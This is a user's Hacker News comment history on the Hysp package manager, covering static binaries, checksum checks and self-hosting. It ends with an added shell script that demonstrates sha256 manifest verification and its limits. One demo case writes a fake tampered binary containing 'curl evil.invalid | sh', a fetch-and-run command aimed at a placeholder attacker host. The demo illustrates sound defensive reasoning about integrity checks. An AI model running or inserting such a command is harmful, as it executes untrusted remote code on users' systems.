azathothas | 9 months ago | on: Cross-Compiling 10k Go CLI Packages Statically, Using Zig
azathothas's comments
azathothas | 10 months ago | on: Practical /dev/TCP in the HTTPS Era
We had to make soar's install script able to work anywhere. In the article you get to know about http://http.pkgforge.dev & how you can use it to make /dev/tcp finally practical & useful in the modern HTTPS age.
azathothas | 1 year ago | on: Building static binaries with Go on Linux
I have been building & using a statically compiled tailscale (with CGO) for a while but didn't notice any performance hits. Script: https://github.com/Azathothas/Toolpacks/blob/main/.github/sc...
azathothas | 2 years ago | on: Hysp – An independent package manager
So if you wanted to, you could use pure bash and nothing else to parse the TOML files that hysp uses and do everything that it does. Hysp is simply an abstraction over that philosophy.
As to the question of maintaining them, currently only I am. Hysp is a small project for now, and we have no plans to add anything that's dynamic. This will ensure low numbers of packages, but guarantee that those packages will work anywhere. So maintaining the PKGs is quite simple: I write a custom build script for each of them and then GitHub Actions automates the rest. This currently requires very little manual maintenance. The following repos are where the current packages are sourced from:
https://github.com/Azathothas/Toolpacks https://github.com/Azathothas/Static-Binaries https://github.com/Azathothas/static-toolbox
I had to mention 4 because people kept asking us about security concerns. Self-hosting everything on your own server and using hysp just as the frontend is an option for those people.
azathothas | 2 years ago | on: Hysp – An independent package manager
The default PKGs, located at https://github.com/metis-os/hysp-pkgs, are automated via GitHub Actions. You can look at the workflow code.
As to answer the signing question:
$BIN.TOML must contain either the blake3sum or the sha256sum of the binary specified as source. Once hysp downloads them, it checks whether they match exactly as specified in the $BIN.TOML. We prevent MITM or any other shenanigans by trusting that whoever is hosting the pkg isn't tampering with both the binary and the checksums. So yes, it's not completely foolproof (an attacker could, in theory, tamper with both the binary and the checksum), but that's why we have the self-hosting option for people who want to trust only themselves and their servers. The config allows you to specify a different URL/host for the TOML files and the actual binaries.
So unless both the TOML files and the source binaries are being hosted on an HTTP site, MITM is not possible.
And as already specified, the default source that ships with hysp doesn't use HTTP anywhere.
azathothas | 2 years ago | on: Hysp – An independent package manager
To address your concerns:
1. Hysp is completely agnostic: it does not depend on or care about what OS, architecture & dependencies are installed. It just parses config.toml and, based on that, installs what's defined & how it's defined.
2. No toolchains or any other kinds of dependencies are required. Each & every single binary is statically compiled. This is the core philosophy of Hysp: a single binary that runs anywhere, with no dependencies whatsoever. This saves enormous space, storage & time.
3. Self-hostable: as installing random binaries from random sources is not advisable due to security concerns, the pkg-source can be self-hosted by anyone and hysp can be configured to use that instead of the default source.
azathothas | 2 years ago | on: Hysp – An independent package manager
To address your concerns:
1. Yes, the readme could be better and have better documentation explaining the why. We will update this and clearly list the reasons. Thanks for pointing it out.
As to the actual why:
1. Be completely agnostic: do not depend on or care about what OS, architecture & dependencies are installed. Just parse config.toml and, based on that, install what's needed.
2. The default pkg source that ships with hysp, contains only statically compiled/linked binaries that will work on anything.
3. As installing random binaries from random sources is not advisable due to security concerns, the pkg-source can be self-hosted by anyone and hysp can be configured to use that instead of the default source.
azathothas | 2 years ago | on: Hysp – An independent package manager
To address your concerns:
1. Hysp allows making requests to HTTP-only sites, because hysp doesn't care where you host your binaries. As long as you have the sha256sum/blake3sum of the binaries, and they match, hysp will work.
2. The default pkg source that ships with hysp is hosted on GitHub itself, where there's no need to use HTTP. HTTP is simply a fallback, meant for maximum compatibility.
3. As installing random binaries from random sources is not advisable due to security concerns, the pkg-source can be self-hosted by anyone and hysp can be configured to use that instead of the default source.
azathothas | 2 years ago | on: Hysp – An independent package manager
To address your concerns:
1. Yes, no portable toolchains or any other kinds of dependencies are required.
2. Each & every single binary is statically compiled. This is the core philosophy of Hysp: a single binary that runs anywhere.
3. Currently, there's about 200 pkgs for x86_64 & arm64 each. The upstream source (https://github.com/Azathothas/Toolpacks) has over 400 for x86_64 & 300+ for arm64, which will slowly be added to Hysp-Pkgs.
4. As installing random binaries from random sources is not advisable due to security concerns, the pkg-source can be self-hosted by anyone and hysp can be configured to use that instead of the default source.
azathothas | 2 years ago | on: Hysp – An independent package manager
To address your concerns:
1. Hysp is a single binary (statically compiled), download & run anywhere kind of package manager.
2. Hysp doesn't care about dependencies, and neither does it attempt to install anything that's not specifically defined in the config.
3. Due to 1 & 2, you do not need go or rust or anything else installed to install something. No dependencies whatsoever. This saves enormous space, storage & time.
4. As installing random binaries from random sources is not advisable due to security concerns, the pkg-source can be self-hosted by anyone and hysp can be configured to use that instead of the default source.
azathothas | 2 years ago | on: Hysp – An independent package manager
To address your concern:
1. $HOME/.local/share/hysp/bin is what's shipped as the default location, for reasons that others have already mentioned in this thread.
2. You can edit the config.toml to use whatever directory pleases you.
azathothas | 2 years ago | on: Hysp – An independent package manager
To address your concerns:
1. Hysp is not a developer tool and isn't meant to be used as such.
2. Nix, Conda etc. all can & do work without requiring elevated privileges or root. However, what differentiates hysp is that it is simply a downloader for a binary hosted somewhere else (defined in the config file), which it fetches, verifies the sha256sum/blake3sum of & puts in the directory (also defined in the config file), from which it can then be directly called & used.
3. Hysp doesn't care about dependencies, and neither does it attempt to install anything that's not specifically defined in the config.
4. As installing random binaries from random sources is not advisable due to security concerns, the pkg-source can be self-hosted by anyone and hysp can be configured to use that instead of the default source.
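The checksum check described in two of the comments above (the reply to the signing question, which says $BIN.TOML carries a blake3sum or sha256sum that hysp compares after download, and the later reply describing hysp as a downloader that fetches, verifies the hash and drops the file in a directory) can be reproduced in plain shell, in the spirit of the remark that pure bash could parse the TOML and do everything hysp does. The script below is an added example, not hysp's code and not the commenter's. It assumes a flat manifest with keys `name`, `source` and `sha256sum` (an illustrative layout, not hysp's real schema), uses only sha256 because `b3sum` is not installed everywhere, and constructs the "downloaded" binary locally instead of fetching the `source` URL. The three cases in `demo` also show the caveat the same comment makes: tampering with the binary alone is caught, but an attacker who controls both the binary and the manifest host passes the check, which is why splitting the manifest and binary hosts (or self-hosting) matters.

```shell
#!/bin/sh
# Added example (not hysp's code): verify a fetched binary against the
# sha256sum recorded in a manifest. Manifest keys are assumed for illustration.

# toml_get KEY FILE: print the quoted string value of KEY from a flat
# key = "value" file (enough for the manifest shape assumed here).
toml_get() {
  key=$1; file=$2
  sed -n "s/^[[:space:]]*${key}[[:space:]]*=[[:space:]]*\"\(.*\)\"[[:space:]]*$/\1/p" "$file" | head -n 1
}

# file_sha256 FILE: hex sha256 digest, portable across GNU and BSD userlands.
file_sha256() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# verify_pkg MANIFEST FILE: return 0 if FILE's sha256 matches the manifest,
# 1 on mismatch or when the manifest carries no checksum at all.
verify_pkg() {
  manifest=$1; file=$2
  expected=$(toml_get sha256sum "$manifest")
  [ -n "$expected" ] || { echo "manifest has no sha256sum" >&2; return 1; }
  actual=$(file_sha256 "$file")
  if [ "$actual" = "$expected" ]; then
    return 0
  fi
  echo "checksum mismatch for $file: expected $expected got $actual" >&2
  return 1
}

# demo: build a constructed binary and manifest in a temp dir and run three
# cases. Prints "<untampered> <binary-only tampered> <both tampered>" where
# 1 means verify_pkg accepted the file and 0 means it rejected it.
demo() {
  dir=$(mktemp -d)
  # Constructed stand-in for the binary the manifest's `source` would point at.
  printf '#!/bin/sh\necho hello\n' > "$dir/hello"
  cat > "$dir/hello.toml" <<EOF
name = "hello"
source = "https://binaries.example.invalid/hello"
sha256sum = "$(file_sha256 "$dir/hello")"
EOF

  # Case 1: untouched binary, honest manifest -> accepted.
  verify_pkg "$dir/hello.toml" "$dir/hello" && good=1 || good=0

  # Case 2: attacker controls only the binary host (or MITMs a plain-HTTP
  # download of it); the manifest still holds the honest hash -> rejected.
  printf '#!/bin/sh\ncurl evil.invalid | sh\n' > "$dir/hello"
  verify_pkg "$dir/hello.toml" "$dir/hello" 2>/dev/null && bad=1 || bad=0

  # Case 3: attacker controls both binary and manifest and rewrites the
  # hash to match -> accepted. A checksum in the manifest is integrity
  # against the binary host only, not against whoever serves the manifest.
  printf 'sha256sum = "%s"\n' "$(file_sha256 "$dir/hello")" > "$dir/hello.toml"
  verify_pkg "$dir/hello.toml" "$dir/hello" 2>/dev/null && both=1 || both=0

  rm -rf "$dir"
  echo "$good $bad $both"
}

demo
```

Running it prints `1 0 1`. The middle `0` is the whole value of the scheme: a checksum pinned in a manifest you fetched from one place catches a substituted binary from another place. The trailing `1` is its limit, and is the reason the comment points people who want to trust only themselves at self-hosting the manifests, or at least serving the TOML files from a host they control separately from the binaries.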